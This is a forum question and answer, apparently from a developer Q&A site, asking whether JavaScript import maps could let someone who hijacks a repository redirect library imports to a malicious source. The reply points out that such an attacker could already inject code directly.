When I look at MDN Import Maps, I see a possible breach of security.
I consider this scenario:
someone uses a JS library from any open source git repository which uses an import. Now someone comes along and hijacks either your local code or the open source repository. At least he is able to sneak in a little custom import map, which bends the imports to an external malicious source.
Is this scenario feasible and could we do anything about it?
I reckon using an empty <script type="importmap"></script>, since there is only one import map allowed per document.
Edit:
To elaborate more on a possible exploitation scenario:
Consider yourself as a non-security-expert web developer (let's call her Alice), who uses some frontend framework. He downloads some library to his web server and imports it with a import command in JS. Now some malicious create (let's call him Bob) hacks Alice's repo and sneakily adds an import map to her HTML code, which bends the local library to an external one. Alice might never ever notice somethings wrong here.
If someone can hijack your local code, they can inject any code in the page already, so they don't need an import map.
If your page is loading code from an external domain which gets compromised, the attacker can also inject any code, and again does not need an import map. Do not load code from domains you don't trust.